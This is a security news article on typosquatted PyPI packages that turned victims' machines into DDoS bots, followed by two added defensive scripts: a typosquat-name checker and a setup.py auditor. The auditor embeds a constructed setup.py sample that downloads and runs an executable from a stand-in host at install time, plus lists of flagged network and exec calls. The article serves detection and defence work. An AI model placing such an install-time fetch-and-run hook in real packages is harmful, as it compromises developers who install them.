Malicious PyPI Packages Used for DDoS Attacks on Counter-Strike Servers
Security analysts from Checkmarx have discovered a new wave of malware in the PyPI repository. This time the malicious packages are somewhat unusual: instead of stealing credentials or environment variables, they turn the victim's machine into a bot that attacks Counter-Strike servers.
The researchers found 12 malicious packages uploaded to PyPI by a user named devfather777. The attacker spread them by typosquatting: each package was published under a name that differs from a popular package by a single typo, in the hope that developers would install it by mistake when mistyping a package name at the terminal (a common slip when installing via pip). For example, Gesnim instead of Gensim, or TensorFolw instead of TensorFlow.
List of Malicious Libraries
- Gesnim
- Kears
- TensorFolw
- Seabron
- tqmd
- lxlm
- mokc
- ipaddres
- ipdress
- Fflsk
- douctils
- inda
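As an added example (not part of the Checkmarx report), the Python script below checks candidate package names against a list of well-known packages using optimal string alignment distance, which counts the adjacent-letter swaps that account for most of the names above. The popular-package list is a constructed sample, and the two-edit threshold is an assumption; in practice the list would come from the PyPI top-downloads data or an internal allow-list.

```python
"""Flag package names that sit within a couple of edits of a well-known package.

Added example for this article; the popular-package list is a constructed
sample and the two-edit threshold is an assumption, not a value from the report.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed reference list of well-known PyPI packages (in practice: the
# PyPI top-downloads list or an internal allow-list).
POPULAR: List[str] = [
    "gensim", "keras", "tensorflow", "seaborn", "tqdm", "lxml", "mock",
    "ipaddress", "flask", "docutils",
]


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of -, _ and . to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute, plus a
    swap of two adjacent letters, the edit behind most typosquats
    (Gesnim -> Gensim, Kears -> Keras)."""
    la, lb = len(a), len(b)
    d = [[0] * (lb + 1) for _ in range(la + 1)]
    for i in range(la + 1):
        d[i][0] = i
    for j in range(lb + 1):
        d[0][j] = j
    for i in range(1, la + 1):
        for j in range(1, lb + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,         # delete
                          d[i][j - 1] + 1,         # insert
                          d[i - 1][j - 1] + cost)  # substitute / match
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[la][lb]


def closest_popular(name: str, popular: List[str] = POPULAR,
                    max_distance: int = 2) -> Optional[Tuple[str, int]]:
    """Return (popular_name, distance) for the nearest popular package within
    max_distance, or None. An exact match is the legitimate package, not a squat."""
    norm = normalize(name)
    best: Optional[Tuple[str, int]] = None
    for candidate in popular:
        dist = osa_distance(norm, normalize(candidate))
        if dist == 0:
            return None
        if dist <= max_distance and (best is None or dist < best[1]):
            best = (candidate, dist)
    return best


def audit(names: List[str]) -> Dict[str, Tuple[str, int]]:
    """Map each suspicious name to the popular package it imitates."""
    hits: Dict[str, Tuple[str, int]] = {}
    for name in names:
        match = closest_popular(name)
        if match:
            hits[name] = match
    return hits


if __name__ == "__main__":
    # The twelve names from the article. "inda" has no neighbour in the sample
    # list within two edits, which shows the limit of a pure distance check.
    reported = ["Gesnim", "Kears", "TensorFolw", "Seabron", "tqmd", "lxlm",
                "mokc", "ipaddres", "ipdress", "Fflsk", "douctils", "inda"]
    for name, (target, dist) in audit(reported).items():
        print(f"{name:12s} -> {target:12s} (distance {dist})")
```

Run against the list above, every name except "inda" resolves to the package it imitates at distance 1 or 2. The check is cheap enough to run as a pre-install hook or a CI gate over a lock file, but it only catches names that are close to something on the reference list; a squat of a package the list does not contain, or a name that is a plausible new project in its own right, needs a different signal (publisher age, download history, install-time code).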
Once installed, all the packages behaved the same way: code embedded in setup.py, which pip executes while installing a source distribution, checked whether the host was running Windows. If so, it downloaded a payload named test.exe from GitHub. At the time of analysis only 11 of the 69 antivirus engines on VirusTotal flagged the file as malicious, which is consistent with it being a new and relatively stealthy piece of malware written in C++.
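The install-time hook is the part a practitioner can check for before anything runs. The script below is an added example, not code from the report or from the packages; it parses a setup.py with Python's ast module and flags the shape described above: a platform probe combined with a network fetch or a process launch. Both setup.py strings are constructed for the demonstration, the "suspicious" one points at a reserved .invalid hostname and is never executed, and the sets of call names are an assumption about what has no business in a setup script.

```python
"""Static triage of a package's setup.py for the install-time pattern above:
a platform probe followed by a download or an execution.

Added example for this article. The two setup.py strings are constructed for
the demonstration; they are not the campaign's files, and the first one names a
reserved .invalid host, so nothing is ever fetched or run.
"""
import ast
from typing import List, Optional

# Constructed sample shaped like the behaviour described above.
SUSPICIOUS_SETUP = '''
import os, subprocess, urllib.request
from setuptools import setup
if os.name == "nt":
    urllib.request.urlretrieve("https://example.invalid/test.exe", "test.exe")
    subprocess.Popen(["test.exe"])
setup(name="gesnim", version="1.0")
'''

# Constructed benign sample: declares metadata and nothing else.
BENIGN_SETUP = '''
from setuptools import setup
setup(name="gensim", version="4.0", packages=["gensim"])
'''

# Dotted call names that have no business in a setup.py (assumed lists).
NETWORK_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen",
                 "requests.get", "socket.socket", "socket.create_connection"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
              "subprocess.check_output", "os.system", "os.startfile",
              "os.popen", "exec", "eval"}
PLATFORM_PROBES = {"os.name", "sys.platform", "platform.system",
                   "platform.machine"}


def dotted_name(node: ast.AST) -> Optional[str]:
    """Render a Name/Attribute chain such as urllib.request.urlretrieve."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None  # call on a subscript, on another call's result, etc.


def audit_setup_py(source: str) -> List[str]:
    """Return findings as 'kind:name:Lnn' strings, one per offending node."""
    findings: List[str] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in NETWORK_CALLS:
                findings.append(f"network:{name}:L{node.lineno}")
            elif name in EXEC_CALLS:
                findings.append(f"exec:{name}:L{node.lineno}")
        elif isinstance(node, ast.Attribute):
            name = dotted_name(node)
            if name in PLATFORM_PROBES:
                findings.append(f"platform-probe:{name}:L{node.lineno}")
    return findings


def is_suspicious(source: str) -> bool:
    """The campaign's shape: a platform check combined with a fetch or an exec."""
    kinds = {f.split(":", 1)[0] for f in audit_setup_py(source)}
    return "platform-probe" in kinds and bool(kinds & {"network", "exec"})


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, is_suspicious(src), audit_setup_py(src))
```

To inspect a real package without running it, fetch only the source distribution (pip download --no-deps --no-binary :all: PACKAGE), unpack the archive and point audit_setup_py at its setup.py. The check is deliberately narrow: it matches literal dotted names, so an author who hides the import behind __import__ or decodes the payload from a base64 blob before exec will slip past it, and the name sets would need extending for those. Two further caveats: a package published only as a wheel runs no setup.py at install time at all, but can carry the same logic in code that runs on import, so the walk is worth repeating over the package's __init__.py; and installing with pip install --only-binary :all: removes the install-time hook entirely, which is a cheap policy to enforce in CI.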
After installation, the malware established persistence by adding itself to the system's startup items and by installing a system-wide root certificate whose validity period had already expired. Once set up, it connected to a hard-coded URL to fetch its configuration. If three attempts to reach that URL failed, it fell back to polling domains produced by a domain generation algorithm (DGA) over HTTP.
The researchers observed that, after receiving its configuration, the malware turned the infected host into a DDoS bot, which began attacking a Russian Counter-Strike 1.6 server. The operator's goal appears to have been to take down that specific server by infecting enough machines to overwhelm it with traffic.
The GitHub repository that hosted the payload has since been taken down. However, the experts warn that the attacker could easily resume the campaign by hosting the payload on another file-sharing service.